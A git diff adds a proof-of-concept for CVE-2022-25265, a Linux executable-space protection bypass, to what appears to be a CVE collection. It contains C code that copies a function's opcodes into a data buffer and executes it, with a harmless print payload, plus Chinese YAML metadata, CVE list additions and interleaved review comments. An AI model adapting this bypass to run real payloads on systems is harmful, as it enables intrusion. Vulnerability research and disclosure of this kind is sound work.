diff --git a/cve/linux-kernel/2022/CVE-2022-25265/LICENSE b/cve/linux-kernel/2022/CVE-2022-25265/LICENSE
new file mode 100644
index 0000000000000000000000000000000000000000..6aa9d5ecfc7aa4e7626ce744fce56cfc99833a94
--- /dev/null
+++ b/cve/linux-kernel/2022/CVE-2022-25265/LICENSE
@@ -0,0 +1,21 @@
+MIT License
+
+Copyright (c) 2022 x0reaxeax
+
+Permission is hereby granted, free of charge, to any person obtaining a copy
+of this software and associated documentation files (the "Software"), to deal
+in the Software without restriction, including without limitation the rights
+to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
+copies of the Software, and to permit persons to whom the Software is
+furnished to do so, subject to the following conditions:
+
+The above copyright notice and this permission notice shall be included in all
+copies or substantial portions of the Software.
+
+THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
+IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
+FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
+AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
+LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
+OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
+SOFTWARE.
diff --git a/cve/linux-kernel/2022/CVE-2022-25265/README.md b/cve/linux-kernel/2022/CVE-2022-25265/README.md
new file mode 100644
index 0000000000000000000000000000000000000000..520df8195a1544ef58a72e2d25b0a6062c6fc849
--- /dev/null
+++ b/cve/linux-kernel/2022/CVE-2022-25265/README.md
@@ -0,0 +1,28 @@
+# Executable Space Protection Bypass (CVE-2022-25265)
+
+This POC demonstrates execution of bytes located in supposedly non-executable region of binary, therefore completely bypassing executable-space protection.
+
+The root cause of this can be found here:
+https://github.com/torvalds/linux/blob/master/arch/x86/include/asm/elf.h#L280
+
+## Brief
+As it turns out, binary files built on either systems lacking NX or IA32 systems with NX, which do NOT contain the `PT_GNU_STACK` header will be marked with `exec-all`.
+This allows for complete RWX to/from everywhere in the binary.
+
+
+To achieve this, we use "historical" building tools.
+In this case, gcc 3.2.2 running on x86 Slackware9 with Linux 2.4.20
+We will end up with a binary file which can be executed on modern Linux systems, in this case **Linux 5.16.1**
+
+The very same effect MIGHT be achievable with specific linker arguments/scripts, although I have NOT verified this.
+
+The following code will copy assembled bytes of function `dummy()` to character array `harmless_str_buf` and execute the destination array as function.
+
+[Demo with reverse shell](https://youtu.be/zj5z7eB_frk)
+
+# *** DISCLAIMER ***
+This demonstration serves completely for educational purposes.
+Under no circumstances can the author of this code be held responsible
+for any direct or indirect damage caused by misusing any provided code and/or information.
+
+See [LICENSE](https://github.com/x0reaxeax/exec-prot-bypass/blob/main/LICENSE) for more details
diff --git a/cve/linux-kernel/2022/CVE-2022-25265/demo.c b/cve/linux-kernel/2022/CVE-2022-25265/demo.c
new file mode 100644
index 0000000000000000000000000000000000000000..b2380f8aef2610b2e261f7b3692b1c13c6851586
--- /dev/null
+++ b/cve/linux-kernel/2022/CVE-2022-25265/demo.c
@@ -0,0 +1,118 @@
+/**
+ * @file demo.c
+ * @author x0reaxeax
+ * @brief executable-space protection bypass POC
+ * @date 2022-02-16
+ *
+ * @copyright Copyright (c) x0reaxeax 2022
+ *
+ * This POC demonstrates execution of bytes
+ * located in supposedly non-executable region of binary,
+ * therefore completely bypassing executable-space protection.
+ *
+ * The root cause of this can be found here:
+ * https://github.com/torvalds/linux/blob/master/arch/x86/include/asm/elf.h#L280
+ *
+ * As it turns out, binary files built on either
+ * systems lacking NX or IA32 systems with NX,
+ * which do NOT contain the `PT_GNU_STACK` header
+ * will be marked with `exec-all`.
+ *
+ * This allows complete for RWX to/from everywhere in the binary.
+ *
+ * To achieve this, we use "historical" building tools.
+ * In this case, gcc 3.2.2 running on x86 Slackware9 with Linux 2.4.20
+ * We will end up with a binary file which we can run on modern Linux
+ * systems, in this case Linux 5.16.1
+ *
+ * Building:
+ *
+ * `gcc -nostdlib -o demo32 demo.c`
+ *
+ * The following code will copy assembled bytes of function `dummy()`
+ * to character array `harmless_str_buf` and execute the destination array as function.
+ *
+ *
+ * *** DISCLAIMER ***
+ * This demonstration serves completely for educational purposes.
+ * Under no circumstances can the author of this code be held responsible
+ * for any direct or indirect damage caused by misusing provided code and/or information.
+
+ * MIT License
+ *
+ * Copyright (c) 2022 x0reaxeax
+ *
+ * Permission is hereby granted, free of charge, to any person obtaining a copy
+ * of this software and associated documentation files (the "Software"), to deal
+ * in the Software without restriction, including without limitation the rights
+ * to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
+ * copies of the Software, and to permit persons to whom the Software is
+ * furnished to do so, subject to the following conditions:
+ *
+ * The above copyright notice and this permission notice shall be included in all
+ * copies or substantial portions of the Software.
+*/
+
+#define NULL ((void *) 0)
+#define POC
+
+#define BUFSIZE 128
+
+char str[] = "noexec bypassed!\n";
+
+/**
+ * This buffer will be loaded with dummy()'s opcodes
+*/
+char harmless_str_buf[BUFSIZE] = "xrandomdatarandomdatarandomdatarandomdatarandomdatarandomdatarandomdatarandomdatarandomdatarandomdatarandomdatarandomdatarandomx";
+
+/**
+ * dummy function - target shellcode
+ * opcodes of this function will be copied to harmless_str_buf.
+ * included for ease of POC demonstration
+*/
+void dummy(void) {
+ __asm__ volatile (
+ ".intel_syntax noprefix;"
+ "mov eax, 4;" /* sys_write */
+ "mov ebx, 1;" /* stdout */
+ "mov ecx, %[str];"
+ "mov edx, 17;" /* strlen */
+ "int 0x80;" /* syscall */
+ "int3;" /* boundary */
+ ".att_syntax;"
+ :: [str] "r" (str)
+ : "eax", "ebx", "ecx", "edx"
+ );
+}
+
+/**
+ * copies opcodes from `dummy()` to destination buf
+*/
+void (*copy_opcodes(unsigned char *output, unsigned int bufsiz)) (void) {
+ unsigned int i = 0;
+ unsigned char *dummy_ptr = (unsigned char *) dummy;
+ for (i = 0; i < bufsiz; i++) {
+ unsigned char opcode = *(dummy_ptr + i);
+ output[i] = opcode;
+
+ if (opcode == 0xcc) {
+ /* boundary hit */
+ break;
+ }
+ }
+
+ return (void (*)()) output;
+}
+
+int _start(void) {
+#ifdef POC /* execute opcodes in harmless_str_buf */
+ void (*pfunc)() = NULL;
+
+ pfunc = copy_opcodes(harmless_str_buf, BUFSIZE);
+ pfunc();
+#else /* execute dummy() to demonstrate it's purpose */
+ dummy();
+#endif
+
+ return 0; /* segfault */
+}
diff --git a/cve/linux-kernel/2022/yaml/CVE-2022-25265.yaml b/cve/linux-kernel/2022/yaml/CVE-2022-25265.yaml
new file mode 100644
index 0000000000000000000000000000000000000000..d64f2726bf2bef6aa76afd6d322193884ab2515a
--- /dev/null
+++ b/cve/linux-kernel/2022/yaml/CVE-2022-25265.yaml
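Review bot: `copy_opcodes` converts between object and function pointers in both directions, `(unsigned char *) dummy` and `(void (*)()) output`, which ISO C does not define and GCC accepts only as an extension, and the call `copy_opcodes(harmless_str_buf, BUFSIZE)` in `_start` passes a `char *` where `unsigned char *` is declared (a `-Wpointer-sign` warning under `-Wall`); neither cast says what it relies on. I would add `/* object<->function pointer casts: GCC extension, assumes x86 code and data share one flat address space */` above the `dummy_ptr` declaration. `#define NULL ((void *) 0)` is unnecessary because `-nostdlib` only affects linking and the freestanding header `<stddef.h>` already provides `NULL`. The header comment names the precondition (no `PT_GNU_STACK` program header) but not how to confirm it on the built `demo32`; a line such as `/* precondition: readelf -lW demo32 lists no GNU_STACK program header */` would document it, and that same check is what an auditor uses to find binaries affected by this condition.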
@@ -0,0 +1,19 @@
+id: CVE-2022-25265
+source: https://github.com/x0reaxeax/exec-prot-bypass
+info:
+ name: Linux kernel是Linux操作系统的主要组件,也是计算机硬件与其进程之间的核心接口。它负责两者之间的通信,还要尽可能高效地管理资源。Linux kernel主要负责内存管理、进程管理、设备驱动程序、系统调用和安全防护四项作用。
+ severity: high
+ description: |
+ 在截至Linux 5.16.10的内核中,如果某些二进制文件是在2003年左右建立的(例如,使用GCC 3.2.2和Linux内核2.4.20),那么它们可能具有exec-all属性。这可能导致位于文件中所谓的不可执行区域的字节被执行。
+ scope-of-influence:
+ Linux 5.16.10以前的所有版本
+ reference:
+ - https://nvd.nist.gov/vuln/detail/cve-2022-25265
+ classification:
+ cvss-metrics: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
+ cvss-score: 7.8
+ cve-id: CVE-2022-25265
+ cwe-id: CWE-913
+ cnvd-id: none
+ kve-id: none
+ tags: Linux kernel, 内存损坏
\ No newline at end of file
diff --git a/openkylin_list.yaml b/openkylin_list.yaml
index f822acc2b69f179a6e97f17564d06e258e4fe60d..37ac13ed01e3fb308a303b008661d074dc71201a 100644
--- a/openkylin_list.yaml
+++ b/openkylin_list.yaml
@@ -6,12 +6,24 @@ cve:
 - CVE-2021-42013
 apache-APISIX:
 - CVE-2022-24112
+ apache-CouchDB:
+ - CVE-2022-24706
 apache-solr:
 - CVE-2021-27905
+ apache-tomcat:
+ - CVE-2022-29885
+ - CVE-2020-9484
+ apache-Spark:
+ - CVE-2022-33891
+ apache-tomcat:
+ - CVE-2020-13935
 linux-kernel:
 - CVE-2021-4204
 - CVE-2021-22555
+ - CVE-2021-4154
+ - CVE-2021-3490
 - CVE-2022-34918
+ - CVE-2022-25265
 - CVE-2022-2639
 - CVE-2022-0847
 - CVE-2022-23222
@@ -20,16 +32,24 @@ cve:
 - CVE-2022-0492
 - CVE-2022-2588
 - CVE-2022-25636
+ - CVE-2022-1679
 - CVE-2022-25258
 - CVE-2023-0045
 - CVE-2022-32250
 - CVE-2022-27666
+ - CVE-2021-41073
+ - CVE-2022-0435
+ - CVE-2021-26708
 sudo:
 - CVE-2021-3156
 - CVE-2023-22809
 gitlab:
 - CVE-2021-22205
+ - CVE-2021-22214
 - CVE-2022-1162
+ - CVE-2022-2992
+ - CVE-2022-2185
+ - CVE-2022-2884
 confluence:
 - CVE-2019-3396
 - CVE-2021-26084
@@ -37,6 +57,7 @@ cve:
 polkit:
 - CVE-2021-4034
 vim:
+ - CVE-2021-3778
 - CVE-2022-0351
 - CVE-2022-0359
 - CVE-2022-0413
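Review bot: `scope-of-influence` reads `Linux 5.16.10以前的所有版本` (all versions before 5.16.10) while the `description` line just above says `在截至Linux 5.16.10的内核中` (kernels up to and including 5.16.10), and the NVD entry the `reference` points to uses the inclusive wording ("through 5.16.10"); the two fields contradict each other within the same file, so the scope line should become `Linux 5.16.10及以前的所有版本`. The `tags` value `内存损坏` (memory corruption) also sits oddly next to `cwe-id: CWE-913` (improper control of dynamically-managed code resources): the defect the description gives is execution of bytes from a region meant to be non-executable, not a memory-safety fault, so a tag naming the executable-space-protection bypass would be more accurate.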
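Review bot: the key `apache-tomcat:` is added twice under `cve:` in the first openkylin_list.yaml hunk — once with `CVE-2022-29885` and `CVE-2020-9484`, and again four lines later with `CVE-2020-13935`. YAML requires mapping keys to be unique; loaders either reject the document or keep only the last occurrence, in which case the first two IDs silently vanish from anything that consumes this list. Merge them into one block: `apache-tomcat:` followed by `- CVE-2022-29885`, `- CVE-2020-9484`, `- CVE-2020-13935`.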
@@ -51,16 +72,21 @@ cve:
 - CVE-2022-2257
 - CVE-2022-2264
 - CVE-2022-2598
+ - CVE-2023-0433
 openssl:
 - CVE-2022-1292
 - CVE-2022-2274
 - CVE-2022-3602
 - CVE-2023-25136
+ - CVE-2021-3449
+ - CVE-2022-0778
 libxml2:
 - CVE-2020-24977
 - CVE-2021-3517
 - CVE-2021-3518
 - CVE-2021-3537
+ redis:
+ - CVE-2022-31144
 cnvd:
 kve:
 kylin-software-properties:
@@ -71,4 +97,4 @@ kve:
 kylin-display-switch:
 - KVE-2022-0206
 kylin-activation:
- - KVE-2022-0231
+ - KVE-2022-0231
\ No newline at end of file